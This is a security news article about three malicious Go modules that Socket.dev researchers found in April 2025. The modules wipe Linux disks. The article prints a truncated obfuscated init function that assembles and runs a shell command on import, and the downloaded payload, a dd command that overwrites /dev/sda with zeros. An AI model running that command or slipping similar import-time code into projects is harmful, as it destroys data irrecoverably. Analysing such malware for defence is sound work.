A devastating new supply-chain attack has emerged in the Go ecosystem, with attackers deploying highly destructive disk-wiping malware through seemingly legitimate modules.
This sophisticated attack exploits the inherent openness of Go’s package ecosystem, where developers routinely source modules directly from GitHub repositories with minimal gatekeeping or verification processes.
The malicious modules employ advanced obfuscation techniques to conceal their true purpose while delivering catastrophic payloads designed to irreversibly destroy data.
.png
)
The attack specifically targets developers by leveraging namespace confusion, a growing problem in the Go ecosystem where multiple similarly named modules create ambiguity about which packages are legitimate.
This ambiguity makes it exceptionally difficult for developers to identify malicious imposters, even when packages aren’t strictly “typosquatted.”
The attackers carefully crafted module names to appear trustworthy at a glance, significantly increasing the likelihood of inadvertent integration into development projects.
Socket.dev researchers identified three malicious Go modules in April 2025 that employed similar obfuscation techniques: github[.]com/truthfulpharm/prototransform, github[.]com/blankloggia/go-mcp, and github[.]com/steelpoor/tlsproxy.
Despite appearing legitimate, these modules contained hidden code designed to fetch and execute remote payloads, triggering Socket’s security scanners and prompting a deeper investigation.
The impact of these modules is particularly severe as they deliver a devastating disk-wiping payload.
Once activated, the malware executes commands that systematically overwrite every byte of data on the primary storage device with zeros, making recovery virtually impossible.
For affected organizations, this results in complete data loss, operational downtime, and potentially millions in damages due to unrecoverable systems and infrastructure.
Inside the Infection Mechanism
The attackers employed sophisticated string obfuscation techniques to hide their malicious intent.
Analysis of one module revealed an initialization function that executes automatically when the package is imported:-
func eGtROk() error {
DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "..."}
pBRPhsxN := runtime. GOOS == "linux"
bcbGOM := "/bin/sh"
vpqIU := "-c"
PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43]...
if pBRPhsxN {
exec.Command(bcbGOM, vpqIU, PWcf).Start()
}
return nil
}
var GEeEQNj = eGtROk()This obfuscated code assembles and executes a command that downloads a shell script containing a single devastating command:-
#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
syncThis simple yet catastrophic payload uses the dd utility to write zeros directly to the primary storage device, systematically destroying the file system structure, operating system, and all user data.
The attack specifically targets Linux systems, checking the operating system before execution, ensuring it impacts primarily Linux-based servers or developer environments.
Are you from the SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
